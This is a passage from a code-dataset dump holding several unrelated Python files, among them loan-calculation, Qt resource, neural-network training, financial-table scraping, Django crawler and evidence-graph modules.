limit\r\n\r\nbest_clients['credit_limit']=best_clients['loan_ammount_monthly_payment']*best_clients['recomended_loan_term']\r\n#best_clients['credit_limit']=best_clients.replace([best_clients['credit_limit']>best_clients['credit_limit']*2,best_clients['credit_limit']*2])\r\n\r\n# Annual interest to make the loan profitable\r\n# According to CONDUSEF, the annual interest rate is between 40% and up to 78%\r\n# for PYMES, so we should be in that range, or even offer a better rate to\r\n# help and attract more clients, also considering that the automation Konfio\r\n# develops lets them have low operational costs, so a lower rate is possible.\r\n\r\n# Considering a 40% rate (3.33% monthly rate)\r\n\r\nbest_clients['loan_term_in_years']=best_clients['recomended_loan_term']/12\r\nbest_clients['minimum_interest_loan_40%']=best_clients['loan_term_in_years']*best_clients['loan_ammount_monthly_payment']*.333\r\n\r\n# Considering the 78% rate (6.5% monthly rate)\r\nbest_clients['maximum_interest_loan_78%']=best_clients['loan_term_in_years']*best_clients['loan_ammount_monthly_payment']*.65\r\n\r\n# To define the interest, we should know more about Konfio's\r\n# operational costs, and probably consider other factors such as inflation, to set\r\n# an adequate rate for each client.\r\n\r\nresults = best_clients[['id', 'free_income','loan_ammount_monthly_payment',\r\n                        'recomended_loan_term','loan_term_in_years','credit_limit',\r\n                        'minimum_interest_loan_40%','maximum_interest_loan_78%',\r\n                        ]].copy()\r\n\r\n#results['credit_limit']=results.replace([results['credit_limit']>(results['credit_limit']*2),results['credit_limit']*2])\r\n\r\n\r\nresults.to_csv('results.csv',index=False)\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.title('')\r\nplt.plot(results['id'],results['free_income'],label='Free Income')\r\nplt.plot(results['id'],results['loan_ammount_monthly_payment'],label='Loan Monthly Payment')\r\nplt.plot(results['id'],results['credit_limit'],label='Credit Limit')\r\nplt.plot(results['id'],results['minimum_interest_loan_40%'],label='Min Interest 
Loan')\r\nplt.plot(results['id'],results['maximum_interest_loan_78%'],label='Max Interest Loan')\r\nplt.legend()\r\nplt.xlabel('Id')\r\nplt.ylabel('$')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"lscsrzss/konfio","sub_path":"results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72590819400","text":"from json import load\nfrom logging import getLogger\nfrom os import listdir, mkdir, path, remove\nfrom os.path import exists\nfrom pathlib import Path\n\nfrom PySide6.QtGui import QIcon\n\nfrom pynetix import (__date__, __description__, __project__, __resources__,\n __version__)\n\n\nclass Resource:\n\n stylesheetsDir = __resources__ / 'stylesheets'\n styles = {'Application': 'application',\n 'SideBar': 'sidebar',\n 'QSplitter Base': 'splitter_base',\n 'QSplitter Hover': 'splitter_hover'}\n\n themeDir = __resources__ / 'colourschemes'\n theme = {'WHITE': '#ffffff', 'RED': '#ff0000', 'ORANGE': '#fe8019', }\n\n iconDir = __resources__ / 'icons'\n iconRawDir = iconDir / 'raw'\n iconColouredDir = iconDir / 'coloured'\n icons = {'Arrow Down': 'down_arrow.svg',\n 'Arrow Right': 'right_arrow.svg'}\n\n textDir = __resources__ / 'texts'\n texts = {'about': 'about.html'}\n replacements = {'description': __description__, 'version': __version__,\n 'date': __date__}\n\n @staticmethod\n def getStyle(name: str) -> str:\n userFile = Resource.stylesheetsDir / \\\n f'{Resource.styles[name]}_user.qss'\n defaultFile = Resource.stylesheetsDir / f'{Resource.styles[name]}.qss'\n\n try:\n sheet = Resource._readFile(userFile)\n except FileNotFoundError:\n sheet = Resource._readFile(defaultFile)\n\n sheet = Resource._applyTheme(sheet)\n\n return sheet\n\n @staticmethod\n def updateColourScheme(theme: str) -> None:\n file = Resource.themeDir / f'{theme}.json'\n try:\n with open(file) as f:\n Resource.theme = load(f)\n Resource._updateIconColours()\n except:\n raise ValueError\n\n @staticmethod\n def getColour(colour: str) -> str:\n return Resource.theme[colour]\n\n @staticmethod\n def listThemes():\n availableThemes = []\n for file in listdir(str(Resource.themeDir)):\n try:\n with open(Resource.themeDir / file, 'r') as f:\n load(f)\n except:\n pass\n else:\n availableThemes.append(Path(file).stem)\n\n return tuple(availableThemes)\n\n @staticmethod\n def getIcon(name: str):\n iconPath = str(Resource.iconColouredDir / Resource.icons[name])\n\n if path.isfile(iconPath):\n try:\n icon = QIcon(iconPath)\n except ValueError:\n getLogger(__project__).warning(f'Icon \"{name}\" not readable.')\n icon = QIcon()\n else:\n getLogger(__project__).warning(f'Icon \"{name}\" not found.')\n icon = QIcon()\n\n return icon\n\n @staticmethod\n def getIconPath(name: str) -> str:\n iconPath = str(Resource.iconColouredDir / Resource.icons[name])\n\n if path.isfile(iconPath):\n return iconPath\n else:\n #getLogger(__project__).warning(f'Icon \"{name}\" not found.')\n return ''\n\n @staticmethod\n def getText(text: str) -> str:\n path = Resource.textDir / Resource.texts[text]\n text = Resource._readFile(path).format(**Resource.replacements)\n\n return text\n\n @staticmethod\n def _applyTheme(sheet: str) -> str:\n for colour in Resource.theme:\n sheet = sheet.replace(fr'$({colour})', Resource.theme[colour])\n\n return sheet\n\n @staticmethod\n def _readFile(path):\n if exists(path):\n with open(path, 'r') as f:\n return f.read()\n else:\n raise FileNotFoundError\n\n 
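# Regenerate the theme-coloured icon set: remove stale SVGs, substitute\n    # the $(COLOUR) placeholders in each raw icon with the active theme's\n    # values, and write the results into the coloured-icons directory.\n    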
@staticmethod\n def _updateIconColours():\n if not path.isdir(Resource.iconColouredDir):\n mkdir(Resource.iconColouredDir)\n\n for icon in Resource.icons.values():\n try:\n remove(Resource.iconColouredDir / icon)\n except FileNotFoundError:\n pass\n\n try:\n with open(Resource.iconRawDir / icon, 'r') as f:\n content = f.read()\n except FileNotFoundError:\n pass\n getLogger(__project__).warning(f'Icon \"{icon}\" not found.')\n else:\n content = Resource._applyTheme(content)\n with open(Resource.iconColouredDir / icon, 'w') as f:\n f.write(content)\n","repo_name":"brands-d/Pynetix","sub_path":"pynetix/resources/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"73681135561","text":"from ex30.ex30_lib_graph import plot2\nfrom sknn.mlp import Regressor, Layer\nimport numpy as np\nfrom sklearn.preprocessing.data import StandardScaler\n\nOUTPUT_PNG_FILE = '/experiments/ex30/ex30_ann.png'\n\nX = [[float(x), float(x), float(x)] for x in range(0,24)]\nY = [12.0, 13.0, 13.0, 13.0, 28.0, 31.0, 38.0, 60.0, 85.0, 80.0, 64.0, 60.0, 59.0, 58.0, 65.0, 70.0, 80.0, 90.0, 110.0, 100.0, 85.0, 65.0, 45.0, 20.0 ]\n\nX2 = [[float(x)/10.0, float(x)/10.0, float(x)/10.0] for x in range(0,231)]\n \nlayers = []\nlayers.append(Layer(\"Rectifier\", units=100))\nlayers.append(Layer(\"Rectifier\", units=100))\nlayers.append(Layer(\"Rectifier\", units=100))\nlayers.append(Layer(\"Linear\"))\n\nmodel = Regressor(\n layers=layers,\n learning_rate=0.001,\n n_iter=5000,\n random_state=42)\n\nnormalizer_X = StandardScaler()\ntrainX = normalizer_X.fit_transform(X)\ntrainX2 = normalizer_X.fit_transform(X2)\nnormalizer_Y = StandardScaler()\ntrainY = normalizer_Y.fit_transform(Y)\n\nmodel.fit(np.array(trainX), np.array(trainY))\nY_pred = model.predict(np.array(trainX2))\nY_pred = normalizer_Y.inverse_transform(Y_pred)\n\nY_pred = [y[0] for y in Y_pred]\n\nprint(str(Y_pred))\n\nplot2(\n Y, \n Y_pred, \n OUTPUT_PNG_FILE,\n \"Observed pollution concentration levels\",\n \"Predicted pollution concentration levels by ANR\")\n\n","repo_name":"gabormakrai/landuseregression","sub_path":"experiments/src/ex30/ex30_ann.py","file_name":"ex30_ann.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"63"} +{"seq_id":"22591821467","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport math\n\nfrom ...sprites.rectangle_sprite import RectangleSprite\nfrom .bullet import Bullet\n\n\nclass Alien(RectangleSprite):\n BASE_SPEED = 0.5\n VARIABLE_SPEED = 0.1 # Additional speed per dead alien.\n LEFT, RIGHT = -1, 1\n\n def __init__(self, x, y):\n super(Alien, self).__init__(x=x, y=y, width=1, height=1, color=(1, 1, 1))\n\n def hit_by(self, other):\n if isinstance(other, Bullet) and other.is_alien:\n return\n\n self.destroy()\n\n def on_alien_advance(self, direction):\n self.move_by(0, 1)\n\n if direction == self.LEFT:\n self._x = math.floor(self._x)\n else:\n self._x = math.ceil(self._x)\n\n y = self.int_position[1]\n if 12 <= y <= 13:\n self.emit(\"destroy_base\", y)\n elif y >= 14:\n self.emit(\"game_over\")\n","repo_name":"bil-bas/pixel-table","sub_path":"pixel_table/modes/invaders/alien.py","file_name":"alien.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} 
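# The record that follows normalises each feature column with the min-max
# idiom before training its MLP. Below is a minimal self-contained sketch of
# that idiom, for reference; the DataFrame and column names are illustrative
# placeholders, not part of the dataset.
import pandas as pd

def min_max_scale(df: pd.DataFrame, columns: list) -> pd.DataFrame:
    # Rescale each selected column into [0, 1]: x' = (x - min) / (max - min).
    # A constant column would divide by zero here; the original record does
    # not guard against that either.
    scaled = df.copy()
    for col in columns:
        lo, hi = scaled[col].min(), scaled[col].max()
        scaled[col] = (scaled[col] - lo) / (hi - lo)
    return scaled

# Example: min_max_scale(pd.DataFrame({'x': [1.0, 2.0, 4.0]}), ['x'])['x']
# yields 0.0, 1/3 and 1.0.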
+{"seq_id":"32976878356","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\n\npd.set_option('display.max_columns', None)\n\n\ndef readData():\n # read train set data\n df_train = pd.read_csv('train.csv')\n df_train['train'] = 1\n # read test set data\n df_test = pd.read_csv('test.csv')\n df_test['train'] = 0\n df = pd.concat([df_train, df_test], sort=False,\n ignore_index=True) # concatenate the training set data and test set data\n return df\n\n\ndef onehot(df, col):\n new_df = pd.get_dummies(df[col], prefix=col, sparse=True)\n return new_df\n\n\ndef trainMlp(x_data, y_data, x_test, y_test):\n # split the train set and validation set\n train_data, val_data, train_label, val_label = train_test_split(x_data, y_data, test_size=0.1, random_state=10)\n\n print((x_test.shape))\n print((y_test.shape))\n print((train_data.shape))\n print((train_label.shape))\n # set the dimension for hidden layer\n H_DIM = 4\n\n # number of features in train dataset\n col = len(train_data[0])\n\n # initialize tf\n x = tf.placeholder(float, [None, col])\n y = tf.placeholder(float, [None, 1])\n\n # initialize input layer\n w1 = (tf.Variable(tf.random_normal([col, H_DIM])))\n b1 = tf.Variable(tf.constant(0.0, shape=[H_DIM]))\n # w2 = tf.Variable(tf.random_normal([H_DIM, H_DIM]))\n # b2 = tf.Variable(tf.constant(0.0, shape=[H_DIM]))\n\n # initialize the output layer\n w3 = tf.Variable(tf.random_normal([H_DIM, 1]))\n b3 = tf.Variable(tf.constant(0.0, shape=[1]))\n hidden_layer = tf.nn.tanh(tf.matmul(x, w1) + b1)\n\n # hidden_layer2 = tf.nn.tanh(tf.matmul(hidden_layer, w2) + b2)\n yhat = (tf.matmul(hidden_layer, w3) + b3)\n\n loss = tf.reduce_mean(tf.abs((yhat) - y)) # use mean average error as training loss\n loss2 = tf.reduce_mean(tf.square(tf.abs(yhat) - y)) # use mean square error as validation loss\n optimizer = tf.train.AdamOptimizer(0.05).minimize(loss) # use Adam optimizer\n\n init = tf.global_variables_initializer() # initialize all the data\n sess = tf.Session()\n sess.run(init)\n\n # train 400,000 steps\n for step in range(0, 20000):\n sess.run(optimizer, feed_dict={x: train_data, y: train_label})\n if (step % 400 == 0):\n # observe the loss2 for each session, pick the best loss2, write the csv\n print(sess.run(loss2, feed_dict={x: train_data, y: train_label}))\n print(sess.run(loss2, feed_dict={x: val_data, y: val_label}))\n # print(sess.run(loss2, feed_dict={x: x_test, y: y_test}))\n\n # write the ans csv for testset\n ans_y = sess.run(yhat, feed_dict={x: x_test, y: train_label})\n ans = pd.DataFrame(columns=['Id', 'time'])\n ans['Id'] = [i for i in range(0, 100)]\n ans['time'] = [(abs(i[0])) for i in ans_y]\n ans.to_csv('submission.csv', index=0)\n\n\ndef getCleanData(orgin_df):\n df = pd.DataFrame(orgin_df)\n\n # do onehot for 'penalty'\n df = df.merge(onehot(orgin_df, 'penalty'), left_index=True, right_index=True)\n\n # n_jobs for x=-1\n def fun(x):\n if (x == -1):\n return 16\n else:\n return x\n\n df['n_jobs'] = df['n_jobs'].apply(lambda x: fun(x))\n return df\n\n\ndef doFeatureEngineeriing(df):\n df['new_feature'] = np.log(df.max_iter * df.n_samples * df.n_features * df.n_classes / (1 + df.n_jobs))\n #df['time'] = np.log(df['time'])\n # normalization features\n columns = df.columns.tolist();\n columns.remove('id')\n columns.remove('penalty')\n columns.remove('time')\n columns.remove('train')\n columns.remove('random_state')\n columns.remove('scale')\n columns.remove('l1_ratio')\n columns.remove('n_clusters_per_class')\n 
columns.remove('flip_y')\n    columns.remove('n_informative')\n    for feature in columns:\n        df[feature] = df[[feature]].apply(lambda x: (x - np.min(x)) / (np.max(x) - np.min(x)))\n    df_train = df[df['train'] == 1]\n    df_test = df[df['train'] == 0]\n\n    x_train = df_train[columns]\n    y_train = df_train[['time']]\n    x_test = df_test[columns]\n    y_test = df_test['time']\n\n    # convert to np.array format\n    x_data = np.array(x_train, dtype=np.float32)\n    y_data = np.array(y_train, dtype=np.float32)\n\n    x_test_data = np.array(x_test, dtype=np.float32)\n    y_test_data = np.array(y_test, dtype=np.float32)\n\n    return x_data, y_data, x_test_data, y_test_data\n\n\nif __name__ == '__main__':\n    orgin_df = readData()\n    df = getCleanData(orgin_df)\n    x_data, y_data, x_test_data, y_test_data = doFeatureEngineeriing(df)\n    trainMlp(x_data, y_data, x_test_data, y_test_data.reshape(100, 1))\n","repo_name":"ahchan2018/MSBD-5001-Computing-Performance-Evaluation-Kaggle-Competition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1845266412","text":"import requests\nimport requests as req\nfrom bs4 import BeautifulSoup as bs\nfrom lxml import etree\n\n\n'''\nReference article:\nhttps://zhuanlan.zhihu.com/p/159200115\n'''\nurl = 'http://quotes.money.163.com/f10/lrb_688237.html'\n# mimic a browser's headers\nheaders = {\n    \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\"\n}\n\n# quick test; the headers must be passed as a keyword argument so they are\n# sent as HTTP headers (positionally they would be taken as query params)\nresp = req.get(url, headers=headers)\nresp.encoding = 'utf-8'\nhtml = resp.text\n\n\n# parse the html\ndef get_table_from_html(html):\n    tree = etree.HTML(html)\n    # find all table tags\n    table_lst = 
tree.xpath(\"//table\")\n for table in table_list:\n print(get_table(table))\n print(get_table(table_list[4]).get('data')[32])\n print(get_table(table_list[4]).get('data')[32][4])\n\n\n\n","repo_name":"xiaobabyLu/financeDataCrawAnalyze","sub_path":"dataScripy/finance_by_code.py","file_name":"finance_by_code.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18714466142","text":"import sys\nsys.path.append('..')\nimport argparse\nimport configparser\nfrom local.data_loader import DecodingRun, Session\nfrom scipy.io.wavfile import write as wavwrite\nimport os\nimport logging\nimport pandas as pd\n\n\nlogger = logging.getLogger('extract_trials.py')\n\n\ndef extract_wavs_from_session(session_dir, temp_dir):\n sess = Session(session_dir)\n\n wavs_dir = os.path.join(temp_dir, 'train_wavs')\n os.makedirs(wavs_dir, exist_ok=True)\n\n for i, word in enumerate(sess.words):\n audio = sess.get_trial_by_word(word)[2]\n filename = os.path.join(wavs_dir, '{:03}-{}.wav'.format(i + 1, word))\n wavwrite(filename, 16000, audio)\n\n\ndef extract_wavs_from_decoding_trials(run_dir, temp_dir):\n run = DecodingRun(run_dir)\n run_name = os.path.basename(run_dir)\n\n wavs_dir = os.path.join(temp_dir, '{}_wavs'.format(run_name))\n os.makedirs(wavs_dir, exist_ok=True)\n\n for i, word in enumerate(run.words):\n audio = run.get_trial_by_word(word)[2]\n filename = os.path.join(wavs_dir, '{:03}-{}.wav'.format(i + 1, word))\n wavwrite(filename, 16000, audio)\n\n\ndef generate_trial_label_file(run_dir, temp_dir):\n run = DecodingRun(run_dir)\n run_name = os.path.basename(run_dir)\n\n df_dict = {'start': run.trial_starts_in_sec, 'stop': run.trial_starts_in_sec + 2, 'label': run.words}\n df = pd.DataFrame.from_dict(df_dict)\n df.to_csv(os.path.join(temp_dir, '{}_trials.lab'.format(run_name)), index=False, header=False, sep='\\t')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Extract decoded trials.')\n parser.add_argument('config', help='Path to experiment config file.')\n\n args = parser.parse_args()\n\n # initialize the config parser\n if not os.path.exists(args.config):\n print('WARNING: File path to the config file is invalid. Please specify a proper path. 
Script will exit!')\n        exit(1)\n    config = configparser.ConfigParser()\n    config.read(args.config)\n\n    # initialize logging handler\n    log_file = '.'.join(['train', 'log'])\n    log_file = os.path.join(config['General']['storage_dir'], config['General']['session'], log_file)\n    logging.basicConfig(\n        level=logging.INFO,\n        format='[%(asctime)s] [%(name)-30s] [%(levelname)8s]: %(message)s',\n        datefmt='%d.%m.%y %H:%M:%S',\n        handlers=[logging.StreamHandler(sys.stdout)])\n\n    logging.getLogger('data_loader.py').setLevel(logging.WARNING)\n\n    session_dir = os.path.join(config['General']['storage_dir'], config['General']['session'])\n    decoding_runs = [os.path.join(session_dir, run_dir) for run_dir in os.listdir(session_dir)\n                     if os.path.isdir(os.path.join(session_dir, run_dir))]\n    temp_dir = os.path.join(config['General']['temp_dir'], config['General']['session'])\n    os.makedirs(temp_dir, exist_ok=True)\n\n    logger.info('Processing training data for session {}'.format(os.path.basename(config['General']['session'])))\n\n    # Extract wavs from training session\n    extract_wavs_from_session(session_dir=session_dir, temp_dir=temp_dir)\n\n    # Extract trials from decoding runs\n    for run_dir in decoding_runs:\n        try:\n            logger.info('Processing wavs of {}'.format(os.path.basename(run_dir)))\n\n            # Extract wavs\n            extract_wavs_from_decoding_trials(run_dir=run_dir, temp_dir=temp_dir)\n\n            # Generate .lab file\n            generate_trial_label_file(run_dir=run_dir, temp_dir=temp_dir)\n\n        except Exception as e:\n            logger.warning('Skipping {} due to an exception: {}'.format(run_dir, str(e)))\n","repo_name":"cognitive-systems-lab/closed-loop-seeg-speech-synthesis","sub_path":"eval_steps/extract_trials.py","file_name":"extract_trials.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"63"} +{"seq_id":"30345412748","text":"from .crawler_manager import CrawlerManager\nfrom rest_framework.decorators import permission_classes, api_view\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nimport json\n\nmanager = CrawlerManager(0)\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny, ))\ndef run_crawler(request):\n    data = request.data\n    crawler_name = data['crawler_name']\n    overlap_chk = data['overlap_chk']\n    print(\"in run_crawler\" + str(data))\n    result = manager.run_crawler(crawler_name, overlap_chk)\n\n    return Response(result)\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny, ))\ndef post_category(request):\n    result = {'status': False}\n    category = request.data['category']\n    if category == 'category':\n        result = {'category': manager.send_category_dic_and_info()}\n    elif category == 'sub_category':\n        result = {'sub_category': manager.send_sub_category_dic_and_info()}\n    elif category == 'category_size_part':\n        result = {'category_size_part': manager.send_category_size_part_dic_and_info()}\n    elif category == 'sub_category_size_part':\n        result = {'sub_category_size_part': manager.send_sub_category_size_part_dic_and_info()}\n\n    return Response(result)\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny, ))\ndef post_category_dic_and_info(request):\n    \"\"\"\n    :param request: once the user performs a mapping based on the list passed on by the method above, this method receives the selected information and applies it directly to the DB\n    category: which category information (cate, sub_cate, cate_size_part, etc.) 
정보에 대해서 mapping 을 할 것인지\n info: dic 에 update 할 info 정보 (querySet 형태가 아닌 model 자체 정보가 넘와야 할듯 > 해당 info_pk 로 수정)\n dic: update 대상인 dic 의 정보 (querySet 형태가 아닌 model 자체 정보가 넘와야 할듯 > 해당 dic_pk 로 수정)\n :return:\n \"\"\"\n result = {'status': False}\n try:\n category = request.data['category']\n info_pk = request.data['info_pk']\n dic_pk = request.data['dic_pk']\n except Exception:\n return Response(result)\n\n if category == 'category':\n result = manager.receive_category_dic_info(dic_pk, info_pk)\n elif category == 'sub_category':\n result = manager.receive_sub_category_dic_info(dic_pk, info_pk)\n elif category == 'category_size_part':\n result = manager.receive_category_size_part_dic_info(dic_pk, info_pk)\n elif category == 'sub_category_size_part':\n result = manager.receive_sub_category_size_part_dic_info(dic_pk, info_pk)\n\n return Response(result)\n\n'''\n{\n \"category_dic_id\": 30,\n \"category_similar\": \"INNER WEAR\",\n \"category_info_id\": null\n}\n{\n \"category_info_id\": 17,\n \"category_name\": \"레그웨어/속옷\"\n}\n\n'''","repo_name":"hyungi/sizecom_crawler_module","sub_path":"crawler/crawler_view.py","file_name":"crawler_view.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"20010185270","text":"import json\nimport os\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\nfrom Preference.models import DataEntry\nfrom datetime import datetime\n\nclass Command(BaseCommand):\n help = 'Import data from JSON file'\n\n def handle(self, *args, **options):\n json_file_path = os.path.join(settings.BASE_DIR, 'jsondata.json')\n\n try:\n with open(json_file_path, 'r', encoding='utf-8') as json_file:\n data = json.load(json_file)\n\n for item in data:\n # Handle the intensity field\n try:\n intensity = float(item.get('intensity', 0))\n except (ValueError, TypeError):\n self.stdout.write(self.style.WARNING(f\"Invalid intensity value: {item.get('intensity')}\"))\n intensity = 0 # Set to a default value\n\n # Handle empty or missing added field\n added_str = item.get('added', '')\n if added_str:\n try:\n added = datetime.strptime(added_str, \"%B, %d %Y %H:%M:%S\")\n except ValueError:\n self.stdout.write(self.style.WARNING(f\"Invalid date/time format: {added_str}\"))\n added = None\n else:\n added = None\n\n # Handle empty or missing published field\n published_str = item.get('published', '')\n if published_str:\n try:\n published = datetime.strptime(published_str, \"%B, %d %Y %H:%M:%S\")\n except ValueError:\n self.stdout.write(self.style.WARNING(f\"Invalid date/time format: {published_str}\"))\n published = None\n else:\n published = None\n\n # Handle the likelihood field\n likelihood = item.get('likelihood', None)\n if likelihood == '':\n likelihood = None\n else:\n try:\n likelihood = int(likelihood)\n except (ValueError, TypeError):\n self.stdout.write(self.style.WARNING(f\"Invalid likelihood value: {likelihood}\"))\n likelihood = None\n\n DataEntry.objects.create(\n end_year=item['end_year'],\n intensity=intensity,\n sector=item['sector'],\n topic=item['topic'],\n insight=item['insight'],\n url=item['url'],\n region=item['region'],\n start_year=item['start_year'],\n impact=item['impact'],\n added=added,\n published=published,\n country=item['country'],\n relevance=item['relevance'],\n pestle=item['pestle'],\n source=item['source'],\n title=item['title'],\n likelihood=likelihood,\n )\n\n self.stdout.write(self.style.SUCCESS('Data imported successfully!'))\n 
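            # Note (reviewer suggestion, not in the original script): entries are
            # created one at a time in the loop above; for large JSON files,
            # DataEntry.objects.bulk_create() would reduce database round-trips.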
except FileNotFoundError:\n self.stdout.write(self.style.ERROR(f'File not found: {json_file_path}'))\n","repo_name":"amalmathew21/BlackCoffer","sub_path":"Preference/management/commands/import_data.py","file_name":"import_data.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1556007866","text":"import numpy as np \nimport pandas as pd \n\nfrom sklearn.preprocessing import MinMaxScaler, scale, StandardScaler\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import f1_score\n\npath = '../../project1/data/'\ntrain = pd.read_csv(path + 'train_all2.csv')\ntest = pd.read_csv(path + 'test_all2.csv')\n# features = ['overlap_title', 'temp_diff', 'comm_auth', 'ada_ada_ind', 'reduced_tfidf_sim', 'comm_neighbors', 'in_diff', ']\n#features = ['sim', 'year_diff', 'common_authors', 'cn', 'aai', 'title_overlap']\n# X_train = train.drop(['id1', 'id2', 'jaccard_coeff', 'labels', 'ada_ada_ind', 'comm_auth', 'comm_neigh_s', 'title_sim'], axis=1).values\n# y_train = train['labels']\n# X_test = test.drop(['id1', 'id2', 'jaccard_coeff', 'comm_auth', 'ada_ada_ind', 'comm_neigh_s', 'title_sim'], axis=1).values\nX_train = train.drop(['id1', 'id2', 'link', 'rno1', 'rno2', 'pa'], axis=1).values\ny_train = train['link']\nX_test = test.drop(['id1', 'id2', 'rno1', 'rno2', 'pa'], axis=1).values\n\n\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n# X_train = scale(X_train)\n# X_test = scale(X_test)\nX_train, y_train = shuffle(X_train, y_train, random_state=0)\n\nalphas = [1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1]\nfor alpha in alphas:\n clf = MLPClassifier(hidden_layer_sizes=(30, 15, 5), \n alpha=alpha, \n max_iter=200, \n tol=1e-7,\n verbose=False)\n # print ('cv', cross_val_score(clf, \n # X_train, \n # y_train, \n # cv=5, \n # scoring='f1', \n # n_jobs=-1).mean())\n clf.fit(X_train, y_train)\n\n train_pred = clf.predict(X_train)\n print (\"training set f1 score is\", f1_score(y_train, train_pred, average='micro'))\n\n# test_pred = clf.predict(X_test)\n# preds = pd.DataFrame()\n# preds['id'] = range(len(test))\n# preds['category'] = test_pred\n# preds.to_csv(path+'../result/preds_nn_all.csv', index=False)\n# print ('prediction saved')\n","repo_name":"SWKG21/Porto_Seguro_Safe_Driver_Prediction","sub_path":"notebooks/models/nn_all.py","file_name":"nn_all.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11874360973","text":"\"\"\"\n@author: Andreas Peldszus\n\"\"\"\n\n\nimport networkx as nx\n\n\nclass EvidenceGraph(nx.MultiDiGraph):\n \"\"\"\n A (potentially fully connected) MultiDiGraph, where every edge has a vector\n of scores. 
From this vector of scores, a weighted sum can be calculated to\n assign a single weight to every edge in a newly formed WeightedEvidenceGraph.\n \"\"\"\n\n def __init__(\n self, data=None, main_weight_id=\"weight\", weight_ids=None, **attr\n ):\n \"\"\"\n Constructs a new EvidenceGraph.\n `main_weight_id` is the name of the final total weight.\n `weight_ids` is an iterable with the ids of the different weights.\n\n >>> eg = EvidenceGraph(weight_ids=['cc', 'ro', 'fu', 'at'])\n >>> eg.main_weight_id == \"weight\"\n True\n >>> eg.weight_ids == ['cc', 'ro', 'fu', 'at']\n True\n \"\"\"\n self.main_weight_id = main_weight_id\n self.weight_ids = weight_ids if weight_ids is not None else list()\n super().__init__(data, **attr)\n\n def get_weighted_evidence_graph(self, weights=None):\n \"\"\"\n Returns an isomorph WeightedEvidenceGraph, where every edge has\n as a single score the weighted sum of the various weights assigned\n in the evidence graph.\n\n >>> eg = EvidenceGraph(weight_ids=['cc', 'ro', 'fu', 'at'])\n >>> eg.add_edge(1, 2, type=\"rel_a\", cc=0.1, ro=0.9, fu=0.1, at=0.9)\n >>> eg.add_edge(1, 2, type=\"rel_b\", cc=0.9, ro=0.1, fu=0.9, at=0.1)\n >>> weg = eg.get_weighted_evidence_graph()\n >>> weg.edges(data=True)\n [(1, 2, {'type': 'rel_a', 'weight': 0.5}),\n (1, 2, {'type': 'rel_b', 'weight': 0.5})]\n >>> weg = eg.get_weighted_evidence_graph(weights={'cc': 0.5, 'ro': 0.3, 'fu': 0.2, 'at': 0.0})\n >>> weg.edges(data=True)\n [(1, 2, {'type': 'rel_a', 'weight': 0.34}),\n (1, 2, {'type': 'rel_b', 'weight': 0.66})]\n \"\"\"\n # copy the graph structure\n g = WeightedEvidenceGraph(main_weight_id=self.main_weight_id)\n g.graph = self.graph\n g.add_nodes_from(self.nodes(data=True))\n # default to equally weighted weights\n if weights is None:\n weights = {x: 1.0 for x in self.weight_ids}\n # add the used weighting to the graph data\n g.graph[\"weighting\"] = weights\n # calculate the weighted sum for all weights\n for s, t, k, d in self.edges(keys=True, data=True):\n # keep all the dict entries but the weight_ids\n new_d = {u: v for u, v in d.items() if u not in self.weight_ids}\n # calc weight\n new_d[self.main_weight_id] = self._normalized_weighted_sum(\n d, weights\n )\n g.add_edge(s, t, key=k, attr_dict=new_d)\n return g\n\n def _normalized_weighted_sum(self, d, weights):\n sum_of_weights = 0.0\n sum_of_weighted_weights = 0.0\n for weight_id, weight in weights.items():\n if weight_id not in self.weight_ids or weight_id not in d:\n print(\n (\n \"Warning: '%s' is not a registered weight id. \"\n \"skipping.\"\n )\n % weight_id\n )\n continue\n else:\n w = d[weight_id]\n ww = weight\n sum_of_weights += ww\n sum_of_weighted_weights += w * ww\n return sum_of_weighted_weights / sum_of_weights\n\n\nclass WeightedEvidenceGraph(nx.MultiDiGraph):\n def __init__(self, data=None, main_weight_id=\"weight\", **attr):\n self.main_weight_id = main_weight_id\n super().__init__(data, 